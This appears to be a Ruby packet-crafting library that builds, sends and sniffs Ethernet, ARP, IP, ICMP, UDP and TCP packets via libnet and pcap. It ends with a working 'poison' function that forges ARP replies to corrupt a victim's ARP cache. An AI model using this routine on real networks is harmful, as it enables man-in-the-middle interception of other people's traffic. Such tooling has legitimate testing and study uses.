require 'libnet4r'
require 'pcaplet'
require 'socket'
require 'constants.rb'


# global vars 
$UNSET = ""
$INTERFACE = "lo"
testnet = Libnet.new(0, 0, $INTERFACE)
$DEFAULT_IP = testnet.getip	
$DEFAULT_MAC = testnet.getmac
$INTERFACE = testnet.getdevice
$NUM = 1
$LAYERS = {"Eth"=>1,"Arp"=>2,"Ip"=>3,"Tcp"=>4,"Icmp"=>4,"Udp"=>4}

# Init function
def init(interface)
	testnet = Libnet.new(0, 0, interface)	
	$DEFAULT_IP = testnet.getip	
	$DEFAULT_MAC = testnet.getmac
	$INTERFACE = testnet.getdevice
	puts "IP : #$DEFAULT_IP, MAC : #$DEFAULT_MAC, DEVICE : #$INTERFACE"
end

# and now the Classes :

class Pkt
	attr_reader :underlayer, :upperlayer, :layer	
	attr_writer :underlayer, :upperlayer
	
	def payload=(load)
		@attr["payload"] = load
 		@attr["payloadsize"] = load.length
	end

	def +(other)
				
		if other.instance_of? String   # raw data is added to the highest layer as payload. Set payload directly if you wish to do otherwise
			if @upperlayer.instance_of? NullPkt
				self.payload = other 
			else
				@upperlayer+other
			end
			return self
		else
			if @upperlayer.instance_of? NullPkt
				raise "Layer mismatch" unless other.layer > @layer
				other.underlayer = self
				@upperlayer = other
				
				# set the right protocol flag :
				if @layer == 1 # Ethernet
					@attr["ptype"] = 0 
					@attr["ptype"] = $ETHERTYPE_IP if other.instance_of? IpPkt
					@attr["ptype"] = $ETHERTYPE_ARP if other.instance_of? ArpPkt
				end
				if @layer == 3 # IP
					@attr["proto"] = $IPPROTO_IP
					@attr["proto"] = $IPPROTO_TCP if other.instance_of? TcpPkt
					@attr["proto"] = $IPPROTO_UDP if other.instance_of? UdpPkt
					@attr["proto"] = $IPPROTO_ICMP if other.instance_of? IcmpPkt
				end
			else
				@upperlayer+other
			end
			return self
		end
	end
	
	def head!
		@upperlayer = NullPkt.new
	end

	def queue!
		@underlayer = NullPkt.new
	end
	
	def getlayer(layername)
		n = $LAYERS.fetch(layername ,layername)
		if @layer == n
			return self
		else
			return @upperlayer.getlayer(n) if n > @layer
			return @underlayer.getlayer(n) if n < @layer
		end

	end
	
	def to_s(justme = false)
		str = "### "+self.class.to_s+" ###" + "\n"
		@attr.each {|key, value| 
			if key == "payload"
				str << "#{key} = #{value.gsub(/\W/){ |a|  sprintf("\\x%x",a[0])}}\n"
			else
				str << "#{key} = #{value}\n"
			end
		}
		if justme
			str
		else
			str + @upperlayer.to_s
		end
	end

	def to_code(justme = false)
		str = self.class.to_s+".new("
		@attr.each { |key,value| 
			if key == "payload"
				str << "\"#{key}\"=>\"#{value.gsub(/\W/){ |a|  sprintf("\\x%x",a[0])}}\","
			else	
				str << "\"#{key}\"=>\"#{value}\"," 
			end
		}
		str.chop! # remove the last ","
		str << ")"
		if justme
			str
		else
			if @upperlayer.instance_of? NullPkt
				str
			else
				str + "+" + @upperlayer.to_code 
			end
		end
	end
	def print
		puts self.to_s
	end

	def send
		@underlayer.send
	end
	
	def sr
		@underlayer.sr
	end
	
	def dup
		p = eval(self.to_code)
		return p	
	end
	
	def setmac(mac)
	 	check = true

		array = mac.split(/[:-]/)
		if(array.length == 6)
			0.upto(5) {|i| check &&= (array[i] =~ /^[0-9a-fA-F]{1,2}$/)}
		else
			check = false
		end
		
		raise "Incorrect MAC address" unless(check)
		(array.collect! {|octet| octet.hex}).pack("C6")
	end
end

class NullPkt < Pkt
	def initialize
	end
	def to_s(justme = false)
		return ""
	end
	def to_code(justme = false)
		return "NullPkt.new"
	end
	def getlayer(n)
		return false # a NullPkt has no layer, and is always at some end of the Pkt chain
	end
	def send
		raise "Cannot send at this layer"
	end
	def setsize
		0
	end
	def build(handle, justme = false)
	end
	def setfilter
		return ""
	end
end

class EthPkt < Pkt

	def dst
		@attr["dst"]
	end
	def src
		@attr["src"]
	end
	def ptype
		@attr["ptype"]
	end
	def payload
		@attr["payload"]
	end
	def payloadsize
		@attr["payloadsize"]
	end
	def attr
		@attr
	end
	def dst=(other)
		@attr["dst"] = other
	end
	def src=(other)
		@attr["src"] = other
	end
	def ptype=(other)
		@attr["ptype"] = other.to_i
	end
	def payloadsize=(other)
		@attr["payloadsize"] = other
		@change["payloadsize"] = true		
	end

	def initialize(h = {})
		@attr = {}
		@attr["dst"] = h.fetch("dst", "FF:FF:FF:FF:FF:FF")
		@attr["src"] = h.fetch("src", $DEFAULT_MAC)
		@attr["ptype"] = h.fetch("ptype", 0).to_i
		@attr["payload"] = h.fetch("payload", "")
		@attr["payloadsize"] = h.fetch("payloadssize", $UNSET).to_i

		@layer = 1
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new
		@change = {"payloadsize"=>false}	
	end	
	
	def setsize
		@attr["payloadsize"] = @attr["payload"].length unless @change["payloadsize"] == true
		$LIBNET_ETH_H + @attr["payloadsize"] + @upperlayer.setsize
	end
	
	def send
		self.setsize
		net = Libnet.new($NUM,$LIBNET_LINK,$INTERFACE)
		self.build(net)
		net.write()
	end
	
	def build(handle, justme = false)
		@upperlayer.build(handle) unless justme == true
		handle.eth(setmac(@attr["src"]), setmac(@attr["dst"]), @attr["ptype"], @attr["payload"], @attr["payloadsize"])
	end
	
	def setfilter
		"ether dst #{@attr['src']} "<< @upperlayer.setfilter
	end	

	def sr
		filterstring = self.setfilter
		sniff = Pcaplet.new("-s 1500 -i #$INTERFACE")
		filter = Pcap::Filter.new(filterstring, sniff.capture)
		sniff.add_filter(filter)
		self.send
		for receivedpacket in sniff
			if filter =~ receivedpacket
				reply = pcap2pkt(receivedpacket) 
				return reply
			end
		end
	end
end

class ArpPkt < Pkt

	def op
		@attr["op"]
	end
	def sha
		@attr["sha"]
	end
	def spa
		@attr["spa"]
	end
	def tha
		@attr["tha"]
	end
	def tpa
		@attr["tpa"]
	end	
	def attr
		@attr
	end

	def op=(other)
		@attr["op"] = other.to_i
	end
	def sha=(other)
		@attr["sha"] = other
	end
	def spa=(other)
		@attr["spa"] = other
	end
	def tha=(other)
		@attr["tha"] = other
	end
	def tpa=(other)
		@attr["tpa"] = other
	end


	def initialize(h = {})
		@attr = {}
		@attr["op"] = h.fetch("op", $ARPOP_REQUEST).to_i
		@attr["sha"] = h.fetch("sha", $DEFAULT_MAC)
		@attr["spa"] = h.fetch("spa", $DEFAULT_IP)
		@attr["tha"] = h.fetch("tha", "00:00:00:00:00:00")
		@attr["tpa"] = h.fetch("tpa", "127.0.0.1")

		@layer = 2
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new	
	end
	
	def setsize
		$LIBNET_ARP_ETH_IP_H + @upperlayer.setsize
	end

	def build(handle, justme = false)
		@upperlayer.build(handle) unless justme == true
		handle.arp(@attr["op"], setmac(@attr["sha"]), @attr["spa"], setmac(@attr["tha"]), @attr["tpa"])
	end
	
	def setfilter
		" and arp and !broadcast "<< @upperlayer.setfilter	
	end
end



class IpPkt < Pkt
	
	def len
		@attr["len"]
	end
	def tos
		@attr["tos"]
	end
	def id
		@attr["id"]
	end
	def frag
		@attr["frag"]
	end
	def offset
		@attr["offset"]
	end
	def ttl
		@attr["ttl"]
	end
	def proto
		@attr["proto"]
	end
	def chksum
		@attr["chksum"]
	end
	def src
		@attr["src"]
	end
	def dst
		@attr["dst"]
	end
	def payload
		@attr["payload"]
	end
	def payloadsize
		@attr["payloadsize"]
	end
	def attr
		@attr
	end

	def len=(other)
        	@attr["len"] = other.to_i
		@change["len"] = true
	end
	def tos=(other)
		@attr["tos"] = other.to_i
	end
	def id=(other)
		@attr["id"] = other.to_i
	end
	def frag=(other)
		@attr["frag"] = other.to_i
	end
	def ttl=(other)
		@attr["ttl"] = other.to_i
	end
	def proto=(other)
		@attr["proto"] = other.to_i
	end
	def chksum=(other)
		@attr["chksum"] = other.to_i
		@change["chksum"] = true
	end
	def src=(other)
		@attr["src"] = other
	end
	def dst=(other)
		@attr["dst"] = other
	end
	def payloadsize=(other)
		@attr["payloadsize"] = other.to_i
		@change["payloadsize"] = true
	end

	def initialize(h = {})
		@attr = {}
		@attr["len"] = h.fetch("len", $UNSET).to_i
		@attr["tos"] = h.fetch("tos", 0).to_i
		@attr["id"] = h.fetch("id", 1).to_i
		@attr["frag"] = h.fetch("frag", 0).to_i
		@attr["offset"] = h.fetch("offset", 0).to_i
		@attr["ttl"] = h.fetch("ttl", 64).to_i
		@attr["proto"] = h.fetch("proto", 0).to_i
		@attr["chksum"] = h.fetch("chksum", 0).to_i    # let libnet calculate it if == 0  
		@attr["src"] = h.fetch("src", $DEFAULT_IP)
		@attr["dst"] = h.fetch("dst", "127.0.0.1")
		@attr["payload"] = h.fetch("payload", "")
		@attr["payloadsize"] = h.fetch("payloadsize", $UNSET).to_i
	
		@layer = 3
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new	
		@change = {"payloadsize"=>false,"len"=>false,"chksum"=>false}
	end

	def setsize
		@attr["payloadsize"] = @attr["payload"].length unless @change["payloadsize"] == true
		size = $LIBNET_IPV4_H + @attr["payloadsize"] + @upperlayer.setsize
		@attr["len"] = size unless @change["len"] == true 
		return size
	end
	
	def build(handle, justme = false)
		@upperlayer.build(handle) unless justme == true
		fragment = (@attr["frag"]*(2**13)+@attr["offset"])
		@attr["chksum"] = 0 unless @change["chksum"] == true
		handle.ip(@attr["len"], @attr["tos"], @attr["id"], fragment, @attr["ttl"], @attr["proto"], @attr["chksum"], @attr["src"], @attr["dst"], @attr["payload"], @attr["payloadsize"])
	end
	
	def send
		if @underlayer.instance_of? EthPkt
			@underlayer.send
		else
			self.setsize
			net = Libnet.new($NUM,$LIBNET_RAW4,$INTERFACE)
			self.build(net)
			net.write()
		end
	end
	
	def sr
		if @underlayer.instance_of? EthPkt
			nolink = false
		else
			nolink = true
		end
		filterstring = self.setfilter(nolink)
		sniff = Pcaplet.new("-s 1500 -i #$INTERFACE")
		filter = Pcap::Filter.new(filterstring, sniff.capture)
		sniff.add_filter(filter)
		self.send
		for receivedpacket in sniff
			if filter =~ receivedpacket
				reply = pcap2pkt(receivedpacket) 
				return reply
			end
		end
	end
	
	def setfilter(nolink = false)
		if nolink == false
			return " and ip dst #{@attr['src']} "<< @upperlayer.setfilter	
		else
			return "ip dst #{@attr['src']} "<< @upperlayer.setfilter
		end
	end
end

class IcmpPkt < Pkt

	def type
		@attr["type"]
	end
	def code
		@attr["code"]
	end
	def chksum
		@attr["chksum"]
	end
	def id
		@attr["id"]
	end
	def seqnum
		@attr["seqnum"]
	end
	def payload
		@attr["payload"]
	end
	def payloadsize
		@attr["payloadsize"]
	end
	def attr
		@attr
	end

	def type=(other)
		@attr["type"] = other.to_i
	end
	def code=(other)
		@attr["code"] = other.to_i
	end
	def chksum=(other)
		@attr["chksum"] = other.to_i
		@change["chksum"] = true
	end
	def id=(other)
		@attr["id"] = other.to_i
	end
	def seqnum=(other)
		@attr["seqnum"] = other.to_i
	end
	def payloadsize=(other)
		@attr["payloadsize"] = other.to_i
		@change["payloadsize"] = true
	end

	def initialize(h = {})
		@attr = {}
		@attr["type"] = h.fetch("type", $ICMP_ECHO).to_i
		@attr["code"] = h.fetch("code", 0).to_i
		@attr["chksum"] = h.fetch("chksum", 0).to_i
		@attr["id"] = h.fetch("id", 0).to_i
		@attr["seqnum"] = h.fetch("seqnum", 0).to_i
		@attr["payload"] = h.fetch("payload", "")
		@attr["payloadsize"] = h.fetch("payloadsize", $UNSET).to_i

		@layer = 4
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new
		@change = {"payloadsize"=>false,"chksum"=>false}	

	end

	def setsize
		@attr["payloadsize"] = @attr["payload"].length unless @change["payloadsize"] == true
		$LIBNET_ICMPV4_ECHO_H + @attr["payloadsize"] + @upperlayer.setsize
	end	

	def build(handle, justme = false)
		@upperlayer.build(handle) unless justme == true
		@attr["chksum"] = 0 unless @change["chksum"] == true
		handle.icmp(@attr["type"], @attr["code"], @attr["chksum"], @attr["id"], @attr["seqnum"], @attr["payload"], @attr["payloadsize"])
	end
	
	def setfilter
		if @attr["type"] == $ICMP_ECHO
			return 	" and icmp[icmptype] == icmp-echoreply "<< @upperlayer.setfilter
		else
			return " and icmp " <<@upperlayer.setfilter
		end
	end
end

class UdpPkt < Pkt

	def sport
		@attr["sport"]
	end
	def dport
		@attr["dport"]
	end
	def len
		@attr["len"]
	end
	def chksum
		@attr["chksum"]
	end
	def payload
		@attr["payload"]
	end
	def payloadsize
		@attr["payloadsize"]
	end
	def attr
		@attr
	end

	def sport=(other)
		@attr["sport"] = other.to_i
	end
	def dport=(other)
		@attr["dport"] = other.to_i
	end
	def len=(other)
		@attr["len"] = other.to_i
		@change["len"] = true
	end
	def chksum=(other)
		@attr["chksum"] = other.to_i
		@change["chksum"] = true
	end
	def payloadsize=(other)
		@attr["payloadsize"] = other.to_i
		@change["payloadsize"] = true
	end

	def initialize(h = {})
		@attr = {}
		@attr["sport"] = h.fetch("sport", 53).to_i
		@attr["dport"] = h.fetch("dport", 53).to_i
		@attr["len"] = h.fetch("len", $UNSET)
		@attr["chksum"] = h.fetch("chksum", 0).to_i
		@attr["payload"] = h.fetch("payload", "")
		@attr["payloadsize"] = h.fetch("payloadsize", $UNSET).to_i

		@layer = 4
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new	
		@change = {"payloadsize"=>false,"len"=>false,"chksum"=>false}

	end

	def setsize
		@attr["payloadsize"] = @attr["payload"].length unless @change["payloadsize"] == true
		size = $LIBNET_UDP_H + @attr["payloadsize"]+ @upperlayer.setsize
		@attr["len"] = size unless @change["len"] == true 
		return size
	end

	def build(handle)
		@upperlayer.build(handle)
		@attr["chksum"] = 0 unless @change["chksum"] == true
		handle.udp(@attr["sport"], @attr["dport"], @attr["chksum"], @attr["len"], @attr["payload"], @attr["payloadsize"])
	end

	def setfilter
		" and udp and src port #{@attr['dport']} and dst port #{@attr['sport']} "<< @upperlayer.setfilter	
	end
end

class TcpPkt < Pkt

	def sport
		@attr["sport"]
	end
	def dport
		@attr["dport"]
	end
	def seqnum
		@attr["seqnum"]
	end
	def ack
		@attr["ack"]
	end
	def flags
		@attr["flags"]
	end
	def win
		@attr["win"]
	end
	def chksum
		@attr["chksum"]
	end
	def urg
		@attr["urg"]
	end
	def len
		@attr["len"]
	end
	def payload
		@attr["payload"]
	end
	def payloadsize
		@attr["payloadsize"]
	end
	def attr
		@attr
	end

	def sport=(other)
		@attr["sport"] = other.to_i
	end
	def dport=(other)
		@attr["dport"] = other.to_i
	end
	def seqnum=(other)
		@attr["seqnum"] = other.to_i
	end
	def ack=(other)
		@attr["ack"] = other.to_i
	end
	def flags=(other)
		@attr["flags"] = other.to_i
	end
	def win=(other)
		@attr["win"] = other.to_i
	end
	def chksum=(other)
		@attr["chksum"] = other.to_i
		@change["chksum"] = true
	end
	def urg=(other)
		@attr["urg"] = other.to_i
	end
	def len=(other)
		@attr["len"] = other.to_i
		@change["len"] = true
	end
	def payloadsize=(other)
		@attr["payloadsize"] = other.to_i
		@change["payloadsize"] = true
	end


	def initialize(h = {})
		@attr = {}
		@attr["sport"] = h.fetch("sport", 20).to_i
		@attr["dport"] = h.fetch("dport", 80).to_i
		@attr["seqnum"] = h.fetch("seqnum", 0).to_i
		@attr["ack"] = h.fetch("ack", 0).to_i
		@attr["flags"]= h.fetch("flags", $TCP_SYN).to_i	
		@attr["chksum"] = h.fetch("chksum", 0).to_i
		@attr["win"] = h.fetch("win", 8192).to_i
		@attr["urg"] = h.fetch("urg", 0).to_i
		@attr["len"] = h.fetch("len", $UNSET).to_i
		@attr["payload"] = h.fetch("payload", "")
		@attr["payloadsize"] = h.fetch("payloadsize", $UNSET).to_i

		@layer = 4
		@underlayer = NullPkt.new
		@upperlayer = NullPkt.new	
		@change = {"payloadsize"=>false,"len"=>false,"chksum"=>false}
	end

	def setsize
		@attr["payloadsize"] = @attr["payload"].length unless @change["payloadsize"] == true
		size = $LIBNET_TCP_H + @attr["payloadsize"] + @upperlayer.setsize
		@attr["len"] = size unless @change["len"] == true 
		return size
	end

	def build(handle, justme = false)
		@upperlayer.build(handle) unless justme == true
		@attr["chksum"] = 0 unless @change["chksum"] == true
		handle.tcp(@attr["sport"], @attr["dport"], @attr["seqnum"], @attr["ack"], @attr["flags"], @attr["win"], @attr["chksum"], @attr["urg"], @attr["len"], @attr["payload"], @attr["payloadsize"])	
	end
	
	def setfilter
		" and tcp and src port #{@attr['dport']} and dst port #{@attr['sport']} "<< @upperlayer.setfilter	
	end
end	

# convert from pcap Packet to our own packets
def pcap2pkt(pkt, raw = false)
	raise "Datalink unknown" unless pkt.datalink == Pcap::DLT_EN10MB

	# We don't bother about the link layer unless otherwise specified (or an Arp/athernet only packet )
	
	if pkt.ip?
		proto = pkt.ip_proto
		ip = IpPkt.new("len"=>pkt.ip_len,"tos"=>pkt.ip_tos,"id"=>pkt.ip_id,"frag"=>pkt.ip_flags,"offset"=> pkt.ip_off,"ttl"=>pkt.ip_ttl,"proto"=>proto,"src"=>pkt.ip_src.to_s,"dst"=>pkt.ip_dst.to_s)
		
		case proto
			when $IPPROTO_UDP
				raise "Protocol Mismatch" unless pkt.udp?
				payload = ""
				payload = pkt.udp_data if pkt.udp_len > $LIBNET_UDP_H
				ip+UdpPkt.new("sport"=>pkt.udp_sport,"dport"=>pkt.udp_dport,"len"=>pkt.udp_len,"chksum"=>pkt.udp_sum, "payload"=>payload)
			when $IPPROTO_TCP
				raise "Protocol Mismatch" unless pkt.tcp?
				payload = ""
				payload = pkt.tcp_data if pkt.tcp_data_len > 0
				ip+TcpPkt.new("sport"=>pkt.tcp_sport,"dport"=>pkt.tcp_dport,"seqnum"=>pkt.tcp_seq,"ack"=>pkt.tcp_ack,"flags"=>pkt.tcp_flags,"win"=>pkt.tcp_win,"chksum"=>pkt.tcp_sum,"urg"=>pkt.tcp_urp,"payload"=>payload)
			when $IPPROTO_ICMP
				if (pkt.icmp_type == $ICMP_ECHOREPLY or pkt.icmp_type == $ICMP_ECHO)
					payload = ""
					payload = pkt.icmp_data if pkt.ip_len > ($LIBNET_ICMPV4_ECHO_H + $LIBNET_IPV4_H)
					ip+IcmpPkt.new("type"=>pkt.icmp_type,"code"=>pkt.icmp_code,"id"=>pkt.icmp_id,"seqnum"=>pkt.icmp_seq,"payload"=>payload)
				end
			else
				ip.payload = pkt.ip_data if pkt.ip_len > $LIBNET_IPV4_H
		end
	end
	if !pkt.ip? or raw
		raw_data = pkt.raw_data
		# get ethernet header
		header = raw_data.unpack("C6C6n")
		dst = sprintf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x",header[0],header[1],header[2],header[3],header[4],header[5])
		src = sprintf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x",header[6],header[7],header[8],header[9],header[10],header[11])
		ptype = header[12]

		eth = EthPkt.new("src"=>src,"dst"=>dst,"ptype"=>ptype)
		
		# remove header (keep payload)
		raw_data.slice!(0..13)

		return eth+ip if pkt.ip?  # In that case, we have an ip packet but still want to get link header
		
		if ptype == $ETHERTYPE_ARP
			raw_data.slice!(0..5) # Don't get the first bytes, assume Hardware type = Eth and protocol = IP XXX
			header = raw_data.unpack("nC6C4C6C4")
			op = header[0]
			sha = sprintf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x",header[1],header[2],header[3],header[4],header[5],header[6])
			spa = sprintf("%d.%d.%d.%d",header[7],header[8],header[9],header[10])
			tha = sprintf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x",header[11],header[12],header[13],header[14],header[15],header[16])
			tpa = sprintf("%d.%d.%d.%d",header[17],header[18],header[19],header[20])
			
			return eth + ArpPkt.new("op"=>op,"sha"=>sha,"spa"=>spa,"tha"=>tha,"tpa"=>tpa)
		end
		
		return eth + raw_data
	end
	return ip		
end

# get ip from DNS name
def gethostbyname(name)
	x = Socket::gethostbyname(name)[3].unpack("C4")
	sprintf("%d.%d.%d.%d",x[0],x[1],x[2],x[3])
end

# perform an ARP query
def getmac(name)
	ip = gethostbyname(name)
	p = EthPkt.new + ArpPkt.new("tpa"=>ip)	
	sniff = Pcaplet.new("-s 100 -i #$INTERFACE")
	filter = Pcap::Filter.new('arp', sniff.capture)
	sniff.add_filter(filter)
	p.send
	for p in sniff
		reply = pcap2pkt(p) if filter =~ p
		if reply.getlayer("Arp").op = $ARPOP_REPLY and reply.getlayer("Arp").spa == ip # An ARP reply that is for us
			return reply.getlayer("Arp").sha
		end
	end
end
	
# And now the infamous Arp cache poisoning
# the goal is to put in victim's cache bad_ip instead of normal_ip
def poison(victim, normal_ip, bad_ip)
	hvictim = getmac(victim)
	puts hvictim
	hbad = getmac(bad_ip)
	puts hbad
	p = EthPkt.new("dst"=>hvictim) + ArpPkt.new("op"=>$ARPOP_REPLY,"sha"=>hbad,"spa"=>normal_ip,"tha"=>hvictim,"tpa"=>victim)
	p.send
end
